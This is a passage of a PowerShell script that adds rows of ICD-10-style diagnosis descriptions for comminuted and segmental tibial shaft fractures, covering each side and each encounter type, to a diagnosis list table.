$DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left tibia","Displaced comminuted fracture of shaft of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left tibia","Displaced comminuted fracture of shaft of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left tibia","Displaced comminuted fracture of shaft of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left tibia","Displaced comminuted fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left tibia","Displaced comminuted fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left tibia","Displaced comminuted fracture of shaft of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left tibia","Displaced comminuted fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left tibia","Displaced comminuted fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left tibia","Displaced comminuted fracture of shaft of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left tibia","Displaced comminuted fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left tibia","Displaced comminuted fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left tibia","Displaced comminuted fracture of shaft of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left tibia","Displaced comminuted fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left tibia","Displaced comminuted fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left tibia","Displaced comminuted fracture of shaft of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified tibia","Displaced comminuted fracture of shaft of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified tibia","Displaced comminuted fracture of shaft of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified tibia","Displaced comminuted fracture of shaft of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified tibia","Displaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified tibia","Displaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified tibia","Displaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified tibia","Displaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified tibia","Displaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified tibia","Displaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified tibia","Displaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified tibia","Displaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified tibia","Displaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified tibia","Displaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified tibia","Displaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified tibia","Displaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified tibia","Displaced comminuted fracture of shaft of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right tibia","Nondisplaced comminuted fracture of shaft of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right tibia","Nondisplaced comminuted fracture of shaft of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right tibia","Nondisplaced comminuted fracture of shaft of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right tibia","Nondisplaced comminuted fracture of shaft of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right tibia","Nondisplaced comminuted fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right tibia","Nondisplaced comminuted fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right tibia","Nondisplaced comminuted fracture of shaft of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right tibia","Nondisplaced comminuted fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right tibia","Nondisplaced comminuted fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right tibia","Nondisplaced comminuted fracture of shaft of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right tibia","Nondisplaced comminuted fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right tibia","Nondisplaced comminuted fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right tibia","Nondisplaced comminuted fracture of shaft of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right tibia","Nondisplaced comminuted fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right tibia","Nondisplaced comminuted fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right tibia","Nondisplaced comminuted fracture of shaft of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left tibia","Nondisplaced comminuted fracture of shaft of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left tibia","Nondisplaced comminuted fracture of shaft of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left tibia","Nondisplaced comminuted fracture of shaft of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left tibia","Nondisplaced comminuted fracture of shaft of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left tibia","Nondisplaced comminuted fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left tibia","Nondisplaced comminuted fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left tibia","Nondisplaced comminuted fracture of shaft of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left tibia","Nondisplaced comminuted fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left tibia","Nondisplaced comminuted fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left tibia","Nondisplaced comminuted fracture of shaft of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left tibia","Nondisplaced comminuted fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left tibia","Nondisplaced comminuted fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left tibia","Nondisplaced comminuted fracture of shaft of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left tibia","Nondisplaced comminuted fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left tibia","Nondisplaced comminuted fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left tibia","Nondisplaced comminuted fracture of shaft of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified tibia","Nondisplaced comminuted fracture of shaft of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified tibia","Nondisplaced comminuted fracture of shaft of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified tibia","Nondisplaced comminuted fracture of shaft of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified tibia","Nondisplaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified tibia","Nondisplaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified tibia","Nondisplaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified tibia","Nondisplaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified tibia","Nondisplaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified tibia","Nondisplaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified tibia","Nondisplaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified tibia","Nondisplaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified tibia","Nondisplaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified tibia","Nondisplaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified tibia","Nondisplaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified tibia","Nondisplaced comminuted fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified tibia","Nondisplaced comminuted fracture of shaft of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right tibia","Displaced segmental fracture of shaft of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right tibia","Displaced segmental fracture of shaft of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right tibia","Displaced segmental fracture of shaft of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right tibia","Displaced segmental fracture of shaft of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right tibia","Displaced segmental fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right tibia","Displaced segmental fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right tibia","Displaced segmental fracture of shaft of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right tibia","Displaced segmental fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right tibia","Displaced segmental fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right tibia","Displaced segmental fracture of shaft of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right tibia","Displaced segmental fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right tibia","Displaced segmental fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right tibia","Displaced segmental fracture of shaft of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right tibia","Displaced segmental fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right tibia","Displaced segmental fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right tibia","Displaced segmental fracture of shaft of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left tibia","Displaced segmental fracture of shaft of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left tibia","Displaced segmental fracture of shaft of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left tibia","Displaced segmental fracture of shaft of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left tibia","Displaced segmental fracture of shaft of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left tibia","Displaced segmental fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left tibia","Displaced segmental fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left tibia","Displaced segmental fracture of shaft of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left tibia","Displaced segmental fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left tibia","Displaced segmental fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left tibia","Displaced segmental fracture of shaft of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left tibia","Displaced segmental fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left tibia","Displaced segmental fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left tibia","Displaced segmental fracture of shaft of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left tibia","Displaced segmental fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left tibia","Displaced segmental fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left tibia","Displaced segmental fracture of shaft of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified tibia","Displaced segmental fracture of shaft of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified tibia","Displaced segmental fracture of shaft of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified tibia","Displaced segmental fracture of shaft of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified tibia","Displaced segmental fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified tibia","Displaced segmental fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified tibia","Displaced segmental fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified tibia","Displaced segmental fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified tibia","Displaced segmental fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified tibia","Displaced segmental fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified tibia","Displaced segmental fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified tibia","Displaced segmental fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified tibia","Displaced segmental fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified tibia","Displaced segmental fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified tibia","Displaced segmental fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified tibia","Displaced segmental fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified tibia","Displaced segmental fracture of shaft of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right tibia","Nondisplaced segmental fracture of shaft of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right tibia","Nondisplaced segmental fracture of shaft of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right tibia","Nondisplaced segmental fracture of shaft of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right tibia","Nondisplaced segmental fracture of shaft of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right tibia","Nondisplaced segmental fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right tibia","Nondisplaced segmental fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right tibia","Nondisplaced segmental fracture of shaft of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right tibia","Nondisplaced segmental fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right tibia","Nondisplaced segmental fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right tibia","Nondisplaced segmental fracture of shaft of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right tibia","Nondisplaced segmental fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right tibia","Nondisplaced segmental fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right tibia","Nondisplaced segmental fracture of shaft of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right tibia","Nondisplaced segmental fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right tibia","Nondisplaced segmental fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right tibia","Nondisplaced segmental fracture of shaft of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left tibia","Nondisplaced segmental fracture of shaft of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left tibia","Nondisplaced segmental fracture of shaft of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left tibia","Nondisplaced segmental fracture of shaft of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left tibia","Nondisplaced segmental fracture of shaft of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left tibia","Nondisplaced segmental fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left tibia","Nondisplaced segmental fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left tibia","Nondisplaced segmental fracture of shaft of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left tibia","Nondisplaced segmental fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left tibia","Nondisplaced segmental fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left tibia","Nondisplaced segmental fracture of shaft of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left tibia","Nondisplaced segmental fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left tibia","Nondisplaced segmental fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left tibia","Nondisplaced segmental fracture of shaft of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left tibia","Nondisplaced segmental fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left tibia","Nondisplaced segmental fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left tibia","Nondisplaced segmental fracture of shaft of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified tibia","Nondisplaced segmental fracture of shaft of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified tibia","Nondisplaced segmental fracture of shaft of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified tibia","Nondisplaced segmental fracture of shaft of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified tibia","Nondisplaced segmental fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified tibia","Nondisplaced segmental fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified tibia","Nondisplaced segmental fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified tibia","Nondisplaced segmental fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified tibia","Nondisplaced segmental fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified tibia","Nondisplaced segmental fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified tibia","Nondisplaced segmental fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = 